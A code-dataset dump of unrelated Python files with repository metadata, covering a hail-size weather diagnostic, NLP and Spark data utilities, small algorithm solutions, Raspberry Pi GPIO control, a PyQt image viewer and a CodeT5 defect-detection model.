wet_bulb_height:
Floats of the height of the wet bulb freezing level
Returns:
An updated value for the hail diameter (mm)
"""
vectorised = np.vectorize(lambda n: bisect_right(self._wbzh_keys, n))
height_index = np.array(vectorised(wet_bulb_height) - 1).astype(int)
vectorised = np.vectorize(lambda n: bisect_right(self._hail_groups, n))
hail_index = vectorised(hail_size)
updated_hail_size = self._updated_values[height_index, hail_index]
return np.int8(updated_hail_size)
def hail_size_data(
self,
temperature_at_268: Cube,
pressure_at_268: Cube,
ccl_pressure: Cube,
ccl_temperature: Cube,
humidity_mixing_ratio_at_ccl: np.array,
wet_bulb_zero: Cube,
) -> np.ndarray:
"""Gets temperature of environment at 268.15K, temperature after a dry adiabatic descent
from the pressure of air at 268.15K to ccl pressure and the temperature
after a saturated ascent from ccl pressure to the pressure of air at 268.15K.
From these values it calculates vertical and horizontal indices. It also masks
data where the ccl_temperature is below 268.15K.
Args:
temperature_at_268:
Cube of the temperature of the environment at 268.15K
pressure_at_268:
Cube of the pressure of the environment at 268.15K
ccl_pressure:
Cube of cloud condensation level pressure
ccl_temperature:
Cube of cloud condensation level pressure
humidity_mixing_ratio_at_ccl:
Array of humidity mixing ratio at the pressure of the environment at the CCL
wet_bulb_zero:
Cube of the height of the wet-bulb freezing level
Returns:
An n dimensional array of diameter of hail stones (m)
"""
# temperature_at_268 is big-B in Hand (2011).
# ccl_temperature is big-C in Hand (2011).
# temp_dry is little-c in Hand (2011).
temp_dry = self.dry_adiabatic_descent_to_ccl(
ccl_pressure, temperature_at_268, pressure_at_268
)
# temp_saturated_ascent is little-b in Hand (2011).
temp_saturated_ascent = self.temperature_after_saturated_ascent_from_ccl(
ccl_temperature,
ccl_pressure,
pressure_at_268,
humidity_mixing_ratio_at_ccl,
)
# horizontal is c - B in Hand (2011).
horizontal = temp_dry.data - temperature_at_268.data
# vertical is b - B in Hand (2011).
vertical = temp_saturated_ascent.data - temperature_at_268.data
temperature_mask = np.ma.masked_less(ccl_temperature.data, 268.15)
vertical_masked = np.ma.masked_where(np.ma.getmask(temperature_mask), vertical)
horizontal_masked = np.ma.masked_where(
np.ma.getmask(temperature_mask), horizontal
)
hail_size = self.get_hail_size(
vertical_masked, horizontal_masked, wet_bulb_zero.data
)
hail_size = hail_size / 1000
hail_size = hail_size.astype("float32")
return hail_size
@staticmethod
def make_hail_cube(
hail_size: np.ndarray,
ccl_temperature: Cube,
ccl_pressure: Cube,
attributes: dict,
) -> Cube:
"""Puts the hail data into a cube with appropriate metadata
Args:
hail_size:
An n dimensional array of the diameter of hail stones (m)
ccl_temperature:
Cube of cloud condensation level pressure
ccl_pressure:
Cube of cloud condensation level pressure
attributes:
Dictionary of attributes for the new cube
Returns:
A cube of the diameter of hail stones (m)
"""
hail_size_cube = create_new_diagnostic_cube(
name="diameter_of_hail_stones",
units="m",
template_cube=ccl_temperature,
data=hail_size,
mandatory_attributes=generate_mandatory_attributes(
[ccl_temperature, ccl_pressure]
),
optional_attributes=attributes,
)
return hail_size_cube
def process(
self,
ccl_temperature: Cube,
ccl_pressure: Cube,
temperature_on_pressure: Cube,
wet_bulb_zero_height_asl: Cube,
orography: Cube,
) -> Cube:
"""
Main entry point of this class
Args:
ccl_temperature:
Cube of the cloud condensation level temperature
ccl_pressure:
Cube of the cloud condensation level pressure.
temperature_on_pressure:
Cube of temperature on pressure levels
wet_bulb_zero_height_asl:
Cube of the height of the wet-bulb freezing level above sea level
orography:
Cube of the orography height.
Returns:
Cube of hail diameter (m)
"""
self.check_cubes(
ccl_temperature,
ccl_pressure,
temperature_on_pressure,
wet_bulb_zero_height_asl,
orography,
)
extract_pressure = ExtractPressureLevel(
value_of_pressure_level=268.15, positive_correlation=True
)
pressure_at_268 = extract_pressure(temperature_on_pressure)
temperature_at_268 = next(temperature_on_pressure.slices_over(["pressure"]))
temperature_at_268.rename("temperature_of_atmosphere_at_268.15K")
temperature_at_268.remove_coord("pressure")
temperature = np.full_like(
temperature_at_268.data,
extract_pressure.value_of_pressure_level,
dtype=np.float32,
)
temperature = np.ma.masked_where(np.ma.getmask(pressure_at_268), temperature)
temperature_at_268.data = temperature
attributes = {}
if self.model_id_attr:
attributes[self.model_id_attr] = temperature_on_pressure.attributes[
self.model_id_attr
]
del temperature_on_pressure
humidity_mixing_ratio_at_ccl = saturated_humidity(
ccl_temperature.data, ccl_pressure.data
)
wet_bulb_zero_height = wet_bulb_zero_height_asl - orography
hail_size = self.hail_size_data(
temperature_at_268,
pressure_at_268,
ccl_pressure,
ccl_temperature,
humidity_mixing_ratio_at_ccl,
wet_bulb_zero_height,
)
hail_cube = self.make_hail_cube(
hail_size, ccl_temperature, ccl_pressure, attributes
)
enforce_coordinate_ordering(hail_cube, self.final_order)
return hail_cube
| metoppv/improver | improver/psychrometric_calculations/hail_size.py | hail_size.py | py | 21,733 | python | en | code | 95 | github-code | 90 |
18061555599 | import sys
readline = sys.stdin.readline
MOD = 10 ** 9 + 7
INF = float('INF')
sys.setrecursionlimit(10 ** 5)
def main():
l = list(map(int, readline().split()))
l.sort()
if any([x % 2 == 0 for x in l]):
print(0)
else:
s = l[0] * l[1]
print(s)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p04005/s818956502.py | s818956502.py | py | 326 | python | en | code | 0 | github-code | 90 |
6684951024 | from collections import Counter
import re
class ConllEntry:
def __init__(self, id, form, lemma, pos, cpos, feats=None, parent_id=None, relation=None, deps=None, misc=None):
self.id = id
self.form = form
self.norm = normalize(form)
self.cpos = cpos.upper()
self.pos = pos.upper()
self.parent_id = parent_id
self.relation = relation
self.lemma = lemma
self.feats = feats
self.deps = deps
self.misc = misc
self.pred_parent_id = None
self.pred_relation = None
def __str__(self):
values = [str(self.id), self.form, self.lemma, self.cpos, self.pos, self.feats, str(self.pred_parent_id) if self.pred_parent_id is not None else None, self.pred_relation, self.deps, self.misc]
return '\t'.join(['_' if v is None else v for v in values])
def vocab(conll_path):
wordsCount = Counter()
posCount = Counter()
relCount = Counter()
with open(conll_path, 'r') as conllFP:
for sentence in read_conll(conllFP):
wordsCount.update([node.norm for node in sentence if isinstance(node, ConllEntry)])
posCount.update([node.pos for node in sentence if isinstance(node, ConllEntry)])
relCount.update([node.relation for node in sentence if isinstance(node, ConllEntry)])
return (wordsCount, {w: i for i, w in enumerate(wordsCount.keys())}, posCount.keys(), relCount.keys())
def read_conll(fh):
root = ConllEntry(0, '*root*', '*root*', 'ROOT-POS', 'ROOT-CPOS', '_', -1, 'rroot', '_', '_')
tokens = [root]
for line in fh:
tok = line.strip().split('\t')
if not tok or line.strip() == '':
if len(tokens)>1: yield tokens
tokens = [root]
else:
if line[0] == '#' or '-' in tok[0] or '.' in tok[0]:
tokens.append(line.strip())
else:
tokens.append(ConllEntry(int(tok[0]), tok[1], tok[2], tok[4], tok[3], tok[5], int(tok[6]) if tok[6] != '_' else -1, tok[7], tok[8], tok[9]))
if len(tokens) > 1:
yield tokens
def write_conll(fn, conll_gen):
with open(fn, 'w') as fh:
for sentence in conll_gen:
for entry in sentence[1:]:
fh.write(str(entry) + '\n')
fh.write('\n')
numberRegex = re.compile("[0-9]+|[0-9]+\\.[0-9]+|[0-9]+[0-9,]+");
def normalize(word):
return 'NUM' if numberRegex.match(word) else word.lower()
| elikip/bist-parser | bmstparser/src/utils.py | utils.py | py | 2,463 | python | en | code | 275 | github-code | 90 |
18326082131 | import time
#import downdetector_graber
#import internettrafficreport_graber
import Isitdown_graber
import istheservicedown
import outage_report_grabber
import combiner_v2
import os
while 1==1:
conf=open(os.path.expanduser("~/FCC/senior_project/config.txt"),"r")
conf_data=conf.readlines()
print (conf_data)
refresh=conf_data[1].split(":")
print (refresh)
refresh=refresh[1]
path=conf_data[0].split(":")
print (path)
path=path[1][:-1]
#downdetector_graber.downdetector()
#internettrafficreport_graber.internettrafficreport()
Isitdown_graber.isitdown()
istheservicedown.istheservicedown()
outage_report_grabber.outage()
combiner_v2.combiner(path)
print ("\nGOING TO SLEEP\n")
time.sleep(int(refresh)) | dude13498/senior_project | runner.py | runner.py | py | 794 | python | en | code | 0 | github-code | 90 |
22806764016 | """
Write a funciton that returns true if one array is a rotation of another.
example: [1, 2, 3, 4, 5, 6, 7] and [6, 7, 1, 2, 3, 4, 5]
No duplicates in these arrays.**
Solution: Find 2 indices where the arrays share a common element. Use these 2
indices loop through both arrays simultaneously and check for their similarity.
"""
def is_rotation(list1, list2):
if len(list1) != len(list2): # different sizes, not a rotation.
return False
startIndex = -1;
for x in range(0,len(list1)):
if (list1[0] == list2[x]):
startIndex = x # common element index for list2
break
if (startIndex == -1): # don't share the common element list1[0]
return False
for x in range(0,len(list1)):
if ( startIndex == len(list1) ):
startIndex = 0
if (list1[x] != list2[startIndex]):
return False
startIndex = startIndex +1
return True # doesn't fail any test, is a rotation.
list1 = [1, 2, 3, 4, 5, 6, 7]
list2a = [4, 5, 6, 7, 8, 1, 2, 3]
# is_rotation(list1, list2a) should return False.
list2b = [4, 5, 6, 7, 1, 2, 3]
# is_rotation(list1, list2b) should return True.
list2c = [4, 5, 6, 9, 1, 2, 3]
# is_rotation(list1, list2c) should return False.
list2d = [4, 6, 5, 7, 1, 2, 3]
# is_rotation(list1, list2d) should return False.
list2e = [4, 5, 6, 7, 0, 2, 3]
# is_rotation(list1, list2e) should return False.
list2f = [1, 2, 3, 4, 5, 6, 7]
# is_rotation(list1, list2f) should return True.
list2g = [6, 7, 1, 2, 3, 4, 5]
print( is_rotation(list1, list2g))
| manuel1alvarez/Python-Problems | is_rotation.py | is_rotation.py | py | 1,611 | python | en | code | 0 | github-code | 90 |
1175962762 | from cvzone.ClassificationModule import Classifier
import cv2
cap = cv2.VideoCapture("Res/Spike.mp4")
myClassifier = Classifier()
while True:
img = cap.read()
prediction = myClassifier.getPrediction(img)
cv2.imshow("Image", img)
cv2.waitKey(2) | 1Ne0Phyte1/Everything_Python | OpenCV/OpenCV Projects/Object_detection.py | Object_detection.py | py | 262 | python | en | code | 1 | github-code | 90 |
36493276805 | #Cellule d'importation des modules nécessaires à l'exécution du Notebook
import numpy as np
import pandas as pd
import sklearn as sk
from sklearn import linear_model
import urllib
import sys
#Récupération du fichier de données sur le git du projet
response = urllib.request.urlopen("https://github.com/NaasCraft/projetPython2014/raw/master/clean2.data")
data = response.read() #on obtient un fichier au format "binary literal"
data = data.decode('utf-8').splitlines() #d'où la nécessité d'utiliser la méthode .decode('utf-8')
#On procède au formatage des données en DataFrame du module pandas
data2 = []
provN = ''
indexI, indexJ = 0, 1
indexTuples = []
for l in data:
l2 = l.split(',')
molNum = l2[1].split('_')[0]
#séquence de simplification des identificateurs pour les molécules
if provN != molNum:
indexJ = 1
indexI += 1
else:
indexJ += 1
provN = molNum
indexTuples += [(indexI, indexJ)]
newLine = [indexI, indexJ] + [l2[1]] + [int(x) for x in l2[2:-1]] + [float(l2[len(l2)-1])]
data2.append(newLine)
colNames = ['indexI', 'indexJ', 'molID'] + ['f'+str(k) for k in range(1,167)] + ['class']
multiIndex = pd.MultiIndex.from_tuples(indexTuples, names=['indexI','indexJ'])
dfMusk = pd.DataFrame(data2, columns=colNames, index=multiIndex)
#on utilise trois variables comme index pour pouvoir différencier les "paquets" du problème de MIL
##Nous allons diviser la base en une base test et une base train
import random
random_list = random.sample(range(1,103), 102)
## On veut entre 4500 et 5500 observations car les molécules n'ont pas toutes le même nombre de conformères
num=0
while not ((4500<num) and (5500>num)):
bag_train=random_list[0:82]
bag_test=random_list[83:102]
bag_train=sorted(bag_train)
bag_test=sorted(bag_test)
dfMusk_train=dfMusk[dfMusk["indexI"].isin(bag_train)]
dfMusk_test=dfMusk[dfMusk["indexI"].isin(bag_test)]
num=dfMusk_train.shape[0]
print("The training set has "+str(num)+" observations.")
#Multiple Instance Regression algorithm
#Source : Ray, Soumya; Page, David (2001). "Multiple instance regression", fig. 2
def MIRalg(R, df, list_Bag, dim, lossF):
globalErr = sys.maxsize
count = 0
clf=linear_model.LinearRegression()
for r in range(R):
b0 = np.random.randn(1, dim-1)
bestErr = sys.maxsize
currentErr = 0
done = False
while (not done):
bestConfs = pd.DataFrame(columns=['f'+str(k) for k in range(1,dim)]+['class'])
for i in list_Bag:
minLoss = sys.maxsize
nInst = df.ix[i].shape[0]
for j in range(1,nInst+1):
tempErr = lossF(df.ix[(i,j)].values.tolist()[3:],b0,count)
if (tempErr < minLoss):
minLoss = tempErr
selectedJ = j
currentErr += minLoss
bestConfs.loc[i] = df.ix[(i,selectedJ)].values.tolist()[3:]
if currentErr >= bestErr:
done = True
else:
bestErr = currentErr
b1 = b0
last_clf=clf
#on procède à la régression multiple sur les "bestConfs"
clf = linear_model.LinearRegression()
clf.fit(bestConfs[['f'+str(k) for k in range(1,dim)]].values,bestConfs['class'].values)
b0 = clf.coef_
if bestErr < globalErr:
globalErr = bestErr
b2 = b1
return b2, last_clf
def leastSquaresLoss(l,b,count):
y = l[-1]
X = np.array(l[:-1])
return (y - X.dot(b.T))**2
b, clf = MIRalg(10, dfMusk_train, bag_train, 167, leastSquaresLoss)
##Number of good predictions on the test data set:
## We are going to use the 0-1 loss function here:
dfMusk_test["Prediction"]=clf.predict(dfMusk_test[['f'+str(k) for k in range(1,167)]].values)
#here we need to change dfMusk_test["Prediction"]
print("We have "+str(number_good_pred)+" good predictions of the "+str(dfMusk_test.shape[0])+" observation of the test data set.")
print(dfMusk_test["Prediction"])
##standard output printing
# The coefficients
print('Coefficients: \n', clf.coef_)
# The mean square error
print("Residual sum of squares: %.2f"
% np.mean((clf.predict(dfMusk_train[['f'+str(k) for k in range(1,167)]].values) - dfMusk_train['class'].values) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f' % clf.score(dfMusk_train[['f'+str(k) for k in range(1,167)]].values, dfMusk_train['class'].values))
| NaasCraft/projetPython2014 | wholeCode.py | wholeCode.py | py | 4,789 | python | en | code | 0 | github-code | 90 |
18850624058 | '''
Analysis
1.input คือ การนำข้อมูลเข้าทางแป้นพิมพ์ โดยป้อนตัวเลขเข้าเรื่อยๆ จนกว่าจะเจอ -1 ถึงหยุดรับข้อมูล
2.process คือ เป็นการนำข้อมูลทั้งหมด มาหาค่าเฉลี่ยโดยไม่รวม -1
3.output คือ การแสดงผลของค่าเฉลี่ย
4.Define a Variable คือการกำหนดตัวแปร ในแต่ละข้อมูลเพื่อรับค่าและแสดงผลของค่านั้น
'''
sum = 0.0
n = 0
number = int(input("Enter number :"))
while number > -1:
sum = sum + number
n = n + 1
number = int(input("Enter number :"))
avg = sum / n
print("Avg =", avg) | Jangtiplada/Jang | Homework9.py | Homework9.py | py | 919 | python | th | code | 0 | github-code | 90 |
10419424155 | import torch
import torch.nn as nn
from skimage import io, color
import numpy as np
from dataTools.dataNormalization import *
unNorm = UnNormalize()
class deltaEColorLoss(nn.Module):
def __init__(self, normalize=None):
super(deltaEColorLoss, self).__init__()
self.loss = []
self.normalize = normalize
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def torchTensorToNumpy(self, image):
imageNP = unNorm(image).permute(1,2,0).cpu().detach().numpy() #.reshape(image.shape[1], image.shape[2], image.shape[0])
return imageNP
def __call__(self, genImage, gtImage):
for pair in range(len(genImage)):
# Converting and changing shape of torch tensor into numpy
imageGTNP = self.torchTensorToNumpy(gtImage[pair])
imageGenNP = self.torchTensorToNumpy(genImage[pair])
# Calculating color difference
deltaE = np.absolute(color.deltaE_ciede2000(color.rgb2lab(imageGTNP), color.rgb2lab(imageGenNP)))
if self.normalize:
deltaE /= 255.0
# Mean deifference for an image pair
self.loss.append(np.mean(deltaE))
deltaELoss = torch.mean(torch.tensor(self.loss, requires_grad=True)).to(self.device)
#print(deltaELoss)
return deltaELoss
| sharif-apu/BJDD_CVPR21 | loss/colorLoss.py | colorLoss.py | py | 1,372 | python | en | code | 59 | github-code | 90 |
32631488601 | #!/usr/bin/env python3
# Homework from Paul McWhorter YouTube video lesson 9
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD)
button_up = 36
button_down = 40
led_pin = 38
# The below uses the built-in pullup/pulldown resistors on the Pi
GPIO.setup(button_up, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(button_down, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(led_pin, GPIO.OUT)
# set up the frequency (how many cycles per second)
myPWM = GPIO.PWM(led_pin, 100)
try:
duty_cycle = 0
myPWM.start(duty_cycle)
while True:
read_up = GPIO.input(button_up)
if read_up == 1 and duty_cycle < 100:
duty_cycle += 12.5
myPWM.ChangeDutyCycle(duty_cycle)
sleep(0.5)
read_down = GPIO.input(button_down)
if read_down == 1 and duty_cycle > 0:
duty_cycle -= 12.5
myPWM.ChangeDutyCycle(duty_cycle)
sleep(0.5)
except KeyboardInterrupt:
GPIO.cleanup()
print("\nCleaning up....")
| dmr-git/py | rpi/gpio_pwm.py | gpio_pwm.py | py | 1,022 | python | en | code | 0 | github-code | 90 |
13386392089 | #!/bin/python
#
# Author : Ye Jinchang
# Date : 2015-05-19 15:42:23
# Title : 29 divide two integers
# Divide two integers without using multiplication, division and mod operator.
#
# If it is overflow, return MAX_INT.
class Solution(object):
MAX_INT = (1 << 31) - 1
def divide(self, dividend, divisor):
"""
:type dividend: int
:type divisor: int
:rtype: int
"""
sign = -1 if ((dividend < 0) ^ (divisor < 0)) else 1
result, dvd, dvs = 0, abs(dividend), abs(divisor)
while dvd >= dvs:
inc = dvs
i = 0
while dvd >= inc:
dvd -= inc
result += 1 << i
inc <<= 1
i += 1
result = result if sign == 1 else -result
if result > Solution.MAX_INT:
return Solution.MAX_INT
return result
| Alwayswithme/LeetCode | Python/029-divide-two-integers.py | 029-divide-two-integers.py | py | 904 | python | en | code | 1 | github-code | 90 |
14293597280 | # from PyQt5 import QtWidgets, QtGui, QtCore
# from PyQt5.QtGui import QWheelEvent
# from PyQt5.QtWidgets import QWidget
# from PyQt5.QtCore import Qt, QEvent
from PIL import Image
from base_objs.b_obj import BWindowWorker, BAreaWorker, BFigureWorker, BArea, BLayer
from b_mat.b_mat_worker import generate_mat_from_image
from base_objs.nb_platform import BPlatform
from PyQt5.QtGui import QFont, QPixmap, QMouseEvent, QImage, QWheelEvent
from ui.des import *
from ui.des_m2 import *
from ui.des_m3 import *
import sys
class ImageViewer():
factor = 2.0
def __init__(self, main_window):
self.q_graphics_view = main_window.get_self_ui().graphicsView
self.q_graphics_view.setRenderHints(
QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform
)
self.q_graphics_view.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)
self.q_graphics_view.setBackgroundRole(QtGui.QPalette.Dark)
scene = QtWidgets.QGraphicsScene()
self.q_graphics_view.setScene(scene)
self.q_graphics_view._pixmap_item = QtWidgets.QGraphicsPixmapItem()
scene.addItem(self.q_graphics_view._pixmap_item)
def load_image(self, fileName):
pixmap = QtGui.QPixmap(fileName)
if pixmap.isNull():
return False
self.q_graphics_view._pixmap_item.setPixmap(pixmap)
return True
def zoomIn(self):
self.zoom(self.factor)
def zoomOut(self):
self.zoom(1 / self.factor)
def zoom(self, f):
self.q_graphics_view.scale(f, f)
def resetZoom(self):
self.q_graphics_view.resetTransform()
def fitToWindow(self):
self.q_graphics_view.fitInView(self.q_graphics_view.sceneRect(), QtCore.Qt.KeepAspectRatio)
class BaseWin(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super().__init__(parent)
self.is_loaded = None
self.b_platform = None
self.mat = None
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.view = ImageViewer(self)
self.ui.actionOpen_file.triggered.connect(self.open)
self.ui.actionZoom_in.triggered.connect(self.view.zoomIn)
self.ui.actionZoom_out.triggered.connect(self.view.zoomOut)
self.ui.actionNormal_view.triggered.connect(self.view.resetZoom)
def get_self_ui(self):
return self.ui
def open(self):
image_formats = " ".join(
["*." + image_format.data().decode() for image_format in QtGui.QImageReader.supportedImageFormats()]
)
print('open!!!')
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
self.tr("Open Image"),
QtCore.QDir.currentPath(),
self.tr("Image Files({})".format(image_formats)),
)
self.show_statusbar_msm('Open file: ' + fileName)
if fileName:
if fileName.endswith('.jpg'):
im1 = Image.open(fileName)
fileName = fileName[0:-3] + 'png'
print(fileName)
im1.save(fileName)
self.mat = generate_mat_from_image(fileName)
# print('self.mat.shape' + str(self.mat.shape))
self.is_loaded = self.view.load_image(fileName)
self.start_modal_windows()
self.b_platform = BPlatform(self.mat)
print('FINISH')
# todo
def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:
if self.is_loaded:
if a0.key() == Qt.Key_Escape:
print('Escape button')
self.modal3.reset_all_button_color()
def start_modal_windows(self):
if self.is_loaded:
self.modal = ModalM2(self)
self.modal.show()
self.modal3 = ModalM3(self)
self.modal3.show()
def show_statusbar_msm(self, msm, sec=6000):
self.ui.statusbar.showMessage(msm, sec)
def update(self) -> None:
height, width, channel = self.result_f_mat.shape
bytesPerLine = 4 * width
qImg = QImage(self.result_f_mat.data, width, height, bytesPerLine, QImage.Format_RGBA8888).rgbSwapped()
pixmap = QPixmap(qImg)
pixmap_scaled = pixmap.scaled(900, 1200)
self.img.setPixmap(pixmap_scaled)
self.img.move(5, 5)
class ModalM2(QtWidgets.QWidget):
def __init__(self, parent=BaseWin):
super().__init__(parent, QtCore.Qt.Window)
self.parent = parent
self.modal = Ui_Form()
self.modal.setupUi(self)
self.def_start_val()
self.modal.pushButton.clicked.connect(self.set_factor)
def def_start_val(self):
self.parent.get_self_ui()
self.modal.lineEdit.setText(str(self.parent.view.factor))
def set_factor(self):
self.parent.view.factor = float(self.modal.lineEdit.text())
self.modal.lineEdit.setText(str(self.parent.view.factor))
self.def_start_val()
class ModalM3(QtWidgets.QWidget):
def __init__(self, parent=BaseWin):
super().__init__(parent, QtCore.Qt.Window)
self.base_window = parent
self.modal = Ui_Form3()
self.modal.setupUi(self)
self.pressed_button_background_style = 'background-color: rgb(255, 255, 128);'
self.unpressed_button_background_style = 'background-color: rgb(240, 240, 240);'
self.pressed = None
self.modal.pushButton.clicked.connect(self.pressed_butt_create_figure)
self.modal.pushButton_3.clicked.connect(self.pressed_butt_foo)
def pressed_butt_create_figure(self):
self.modal.pushButton.setStyleSheet(self.pressed_button_background_style)
self.pressed = True
self.base_window.show_statusbar_msm('Pressed button: "create figure"', sec=0)
def pressed_butt_foo(self):
if self.pressed:
print('self.pressed')
self.reset_all_button_color()
def reset_all_button_color(self):
if self.pressed:
for button in self.modal.gridLayoutWidget.findChildren(QtWidgets.QPushButton):
button.setStyleSheet(self.unpressed_button_background_style)
self.pressed = False
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
myapp = BaseWin()
myapp.show()
sys.exit(app.exec_())
| konstantinche36/b_platform | ui/ui_app_start.py | ui_app_start.py | py | 6,299 | python | en | code | 0 | github-code | 90 |
29719068716 | import re
import sys
from pyspark.sql.types import *
from pyspark.sql import SparkSession
from matplotlib import pyplot as plt
def main(argv,session):
input_data = argv[0]
pop_data= argv[1]
out_data = argv[2]
input_rdd = session.sparkContext.textFile(input_data)
pop_rdd = session.sparkContext.textFile(pop_data)
my_rdd = input_rdd.map(lambda line:parse(line)).filter(lambda line:filter_providers(line[1],line[2])).repartition(1)
provider_schema = StructType([
StructField("NPI",StringType(),False),
StructField("ProviderType",StringType(),False),
StructField("State",StringType(),False)
])
provider_df = session.createDataFrame(my_rdd,schema=provider_schema)
provider_df.createOrReplaceTempView("provider")
my_population = pop_rdd.map(lambda line:parse_pop(line)).filter(lambda line:validate_senior_cnt(line[1])).repartition(1)
senior_schema = StructType([
StructField("State",StringType(),False),
StructField("Population",StringType(),False)
])
senior_df = session.createDataFrame(my_population,schema=senior_schema)
senior_df.createOrReplaceTempView("senior")
provider_cnt = spark.sql("SELECT State,ProviderType,Count(Distinct NPI) AS P_cnt \
FROM provider \
GROUP BY State,ProviderType")
provider_cnt.createOrReplaceTempView("state_PG")
ratio_provider_senior = spark.sql("SELECT A.State, B.ProviderType, A.Population AS seniors, B.P_cnt AS providers, (A.Population / B.P_cnt) AS Ratio \
FROM senior A, state_PG B \
WHERE A.State = B.State \
ORDER BY Ratio").repartition(1).persist()
ratio_provider_senior.show()
ratio_provider_senior.write.format('com.databricks.spark.csv').option("header","true").option("delimiter","\t").save(out_data)
generate_boxplot(ratio_provider_senior.toPandas())
return
def parse(line):
general_provider = ['FAMILY PRACTICE','PHYSICIAN ASSISTANT',
'NURSE PRACTITIONER','GENERAL PRACTICE',
'PREVENTIVE MEDICINE','GERIATRIC MEDICINE']
mental_provider = ['PSYCHIATRY','CLINICAL PSYCHOLOGIST','GERIATRIC PSYCHIATRY',
'LICENSED CLINICAL SOCIAL WORKER','PSYCHOLOGIST (BILLING INDEPENDENTLY)',
'NEUROPSYCHIATRY','ADDICTION MEDICINE']
tokens = line.split('\t')
providerType = tokens[13].upper()
if providerType in general_provider:
parsed_tuple = (tokens[0],"GP",tokens[11].upper())
elif providerType in mental_provider:
parsed_tuple = (tokens[0],"MHP",tokens[11].upper())
else:
parsed_tuple = (tokens[0],"else",tokens[11])
return parsed_tuple
def filter_providers(ptype, state):
states = ['AL','AK','AZ','AR','CA','CO','CT','DE','FL','GA','HI','ID','IL',
'IN','IA','KS','KY','LA','ME','MD','MA','MI','MN','MS','MO','MT',
'NE','NV','NH','NJ','NM','NY','NC','ND','OH','OK','OR','PA','RI',
'SC','SD','TN','TX','UT','VT','VA','WA','WV','WI','WY']
if (ptype == "GP" or ptype == "MHP") and (state in states): # To filter Wrong States e.g. 'XX'
return True
else:
return False
def parse_pop(line):
tokens = line.split('\t')
population = tokens[5].replace("\"","").replace(",","")
parsed_tuple = (tokens[0],population)
return parsed_tuple
def validate_senior_cnt(token):
if re.match("^\\d+$",token):
return True
else:
return False
def generate_boxplot(given_df):
given_df.boxplot(column='Ratio', by='ProviderType',figsize=(5,5))
plt.title("Ratio of Health Practitioners to Seniors by ProviderType")
plt.xlabel("ProviderType")
plt.ylabel("Ratio")
plt.suptitle("")
plt.show()
if __name__ == "__main__":
spark = SparkSession.builder \
.appName('validateCheckupsCount') \
.master("local")\
.getOrCreate()
main(sys.argv[1:],spark)
spark.stop() | dorisamo21/bigdata_labs | week12/provideratiosdf.py | provideratiosdf.py | py | 4,423 | python | en | code | 0 | github-code | 90 |
34997868144 | # table作成show関数
def time_log(func):
"""処理時間を計測するデコレータ関数"""
def wrapper(*args,**kwargs):
import datetime
start = datetime.datetime.today()
print("\n---start:" + func.__name__)
res = func(*args,**kwargs)
end = datetime.datetime.today()
delta = end - start
print("\n---end:" + func.__name__,delta,"sec")
return res
return wrapper
@time_log
def show(first=1,end=9):
column=[i for i in range(first,end+1)]
table=[[i*j for i in range(first,end+1)] for j in range(first,end+1)]
digit=[len(str(table[-1][i])) for i in range(len(column))]
left=len(str(table[-1][0]))
str_column="".join(" "*left + " ")
for x in zip(digit,column):
str_column = str_column + "%*s"%x + " "
str_line="".join(" "*left + " +")
for i in digit:
str_line = str_line + "-"*i + "+"
# 1段目
print(str_column)
# 2段目以降
for n in range(len(column)):
print(str_line)
print("%*d"%(left,column[n]),end=" |")
for v in zip(digit,table[n]):
print("%*d"%v,end="|")
print("")
show()
show(5)
show(4,10)
| 96no3/PythonStudy | Python/201910/191008/table_show01.py | table_show01.py | py | 1,309 | python | en | code | 0 | github-code | 90 |
24934941227 | import torch
import torch.nn as nn
import numpy as np
from transformers import (RobertaConfig, RobertaModel, RobertaTokenizer,
BartConfig, BartForConditionalGeneration, BartTokenizer,
T5Config, T5ForConditionalGeneration, T5Tokenizer)
import logging
from mmd import MMDLoss
logger = logging.getLogger(__name__)
MODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),
't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),
'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),
'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer)}
def get_model_size(model):
model_parameters = filter(lambda p: p.requires_grad, model.parameters())
model_size = sum([np.prod(p.size()) for p in model_parameters])
return "{}M".format(round(model_size / 1e+6))
# class GradientReversal(torch.autograd.Function):
#
# lambd = 1.0
# @staticmethod
# def forward(ctx, x):
# return x
#
# @staticmethod
# def backward(ctx, grad_output):
# return GradientReversal.lambd * grad_output.neg()
class ReverseLayerF(torch.autograd.Function):
@staticmethod
def forward(ctx, x, alpha):
ctx.alpha = alpha
return x.view_as(x)
@staticmethod
def backward(ctx, grad_output):
output = grad_output.neg() * ctx.alpha
return output, None
class DefectModel1(nn.Module):
def __init__(self, encoder, config, tokenizer, args,**kwargs):
super(DefectModel1, self).__init__()
self.encoder = encoder
self.config = config
self.tokenizer = tokenizer
self.domain_classifier = nn.Linear(config.hidden_size,8)
self.args = args
self.MMDLoss = MMDLoss(**kwargs)
def get_t5_vec(self, source_ids):
attention_mask = source_ids.ne(self.tokenizer.pad_token_id)
outputs = self.encoder(input_ids=source_ids, attention_mask=attention_mask,
labels=source_ids, decoder_attention_mask=attention_mask, output_hidden_states=True)
hidden_states = outputs['decoder_hidden_states'][-1]
eos_mask = source_ids.eq(self.config.eos_token_id)
if len(torch.unique(eos_mask.sum(1))) > 1:
raise ValueError("All examples must have the same number of <eos> tokens.")
vec = hidden_states[eos_mask, :].view(hidden_states.size(0), -1,
hidden_states.size(-1))[:, -1, :]
return vec
def forward(self, ids=None,domain_labels=None,w_domain=None,lam=None):
loss_fct = nn.CrossEntropyLoss()
new_id_0 = ids[0].view(-1, self.args.max_source_length)
new_id_1 = ids[1].view(-1, self.args.max_source_length)
new_id_2 = ids[2].view(-1, self.args.max_source_length)
